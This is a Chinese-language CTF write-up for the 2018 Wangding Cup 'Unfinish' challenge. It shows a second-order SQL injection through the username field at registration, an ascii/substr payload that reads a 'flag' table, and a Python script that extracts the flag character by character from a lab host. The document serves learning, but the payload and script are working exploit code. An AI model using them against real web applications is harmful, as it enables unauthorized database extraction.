# [网鼎杯 2018] Unfinish

# 参考链接:https://www.cnblogs.com/upfine/p/16607426.html

dirsearch 扫描:扫出 register.php 文件,进行注册

但是发现 SQL 注入的万能钥匙不能注册‘不可以,但是 “可以。可以 fuzz 一下被禁用的符号。

1

5、到这里想着后端代码应该就是 select username from table where username = ‘传递的参数’,这样的结构,经过测试可以通过:1’ or password like ‘% f% 测试列明,但是好像 flag 值所在的表与当前的表不是同一张表,而且也不知道 flag 值所在表的名称,在网上查看了以下,发现是忙才 flag 值所在表的表名称为 flag,然后通过 + 运算进行无列明获取 flag 值,其 payload:0’+ascii (substr ((select * from flag) from 1 for 1))+'0,成功获取到 flag 值得第一位 asii:102 即 f,结果如下:

2

6、确定 payload 之后那就需要通过脚本来获取 flag 值了,脚本信息如下:

import requests
import time
from bs4 import BeautifulSoup
def get_flag():
    flag = ''
    url = 'http://4ecc41d2-2490-46b9-a16a-f384574ca1ca.node4.buuoj.cn:81/'
    register_url = url + 'register.php'
    login_url = url + 'login.php'
    for i in range(1, 100):
        time.sleep(0.5)
        register_data = {"email": "{}@1.com".format(i),
                 "username": "0'+ascii(substr((select * from flag) from {} for 1))+'0".format(i), "password": "1"}
        login_data = {"email": "{}@1.com".format(i), "password": "1"}
        requests.post(register_url, data=register_data)
        response_login = requests.post(login_url, data=login_data)
        bs = BeautifulSoup(response_login.text, 'html.parser') 
        username = bs.find('span', class_='user-name')  # 取返回页面数据的 span class=user-name 属性
        number = username.text  
        flag += chr(int(number))
        print("\r", end="")
        print(flag,end="")
if __name__ == '__main__':
    get_flag()

3

有些不太懂的地方:https://blog.csdn.net/qq_54929891/article/details/124911240

Edited on

Give me a cup of [coffee]~( ̄▽ ̄)~*

odiws WeChat Pay

WeChat Pay

odiws Alipay

Alipay

odiws PayPal

PayPal